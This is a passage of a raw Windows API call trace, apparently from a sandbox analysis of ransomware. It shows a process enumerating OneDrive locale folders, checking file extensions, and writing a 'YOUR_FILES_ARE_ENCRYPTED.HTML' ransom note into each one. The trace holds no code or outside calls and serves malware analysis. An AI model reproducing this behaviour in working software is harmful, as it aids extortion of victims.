[0161.979] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.979] lstrlenW (lpString=".mui") returned 4 [0161.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.979] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.979] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.979] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.980] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.982] CloseHandle (hObject=0x5b8) returned 1 [0161.983] GetProcessHeap () returned 
0x270000 [0161.983] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.983] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nn-no", cAlternateFileName="")) returned 1 [0161.983] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no") returned 77 [0161.983] GetProcessHeap () returned 0x270000 [0161.984] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.984] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no" [0161.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\*" [0161.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.984] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.984] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.984] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.984] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.984] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.984] lstrlenW (lpString=".mui") returned 4 [0161.984] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.984] FindNextFileW (in: 
hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.984] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.985] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nn-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.985] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.988] CloseHandle (hObject=0x5b8) returned 1 [0161.989] GetProcessHeap () returned 0x270000 [0161.989] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.989] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nso-za", cAlternateFileName="")) returned 1 [0161.989] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za") returned 78 [0161.989] GetProcessHeap () returned 0x270000 [0161.990] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.990] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za" [0161.990] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\*" [0161.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.990] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.990] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.990] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\FileSync.LocalizedResources.dll.mui") returned 114 [0161.990] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.990] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.990] lstrlenW (lpString=".mui") returned 4 [0161.990] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.990] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.990] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.991] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0161.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nso-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.991] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.994] CloseHandle (hObject=0x5b8) returned 1 [0161.994] GetProcessHeap () returned 0x270000 [0161.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.996] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad4ad7d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8a1e670, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x6e22a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="OneDriveSetup.exe", cAlternateFileName="ONEDRI~1.EXE")) returned 1 [0161.996] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\OneDriveSetup.exe") returned 89 [0161.996] lstrcmpW (lpString1="OneDriveSetup.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.996] PathFindExtensionW (pszPath="OneDriveSetup.exe") returned=".exe" [0161.996] lstrlenW (lpString=".exe") returned 4 [0161.996] PathFindExtensionW (pszPath="OneDriveSetup.exe") returned=".exe" [0161.996] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="or-in", cAlternateFileName="")) returned 1 [0161.996] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in") returned 77 [0161.996] GetProcessHeap () returned 0x270000 [0161.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.996] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in" [0161.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\*" 
[0161.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.996] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.997] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.997] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.997] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.997] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.997] lstrlenW (lpString=".mui") returned 4 [0161.997] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.997] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.997] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.997] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\or-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.998] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.000] CloseHandle (hObject=0x5b8) returned 1 [0162.001] GetProcessHeap () returned 0x270000 [0162.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.001] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pa", cAlternateFileName="")) returned 1 [0162.001] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa") returned 74 [0162.001] GetProcessHeap () returned 0x270000 [0162.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.001] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa" [0162.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\*" [0162.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.002] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.002] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.002] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.002] lstrlenW (lpString=".mui") returned 4 [0162.002] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
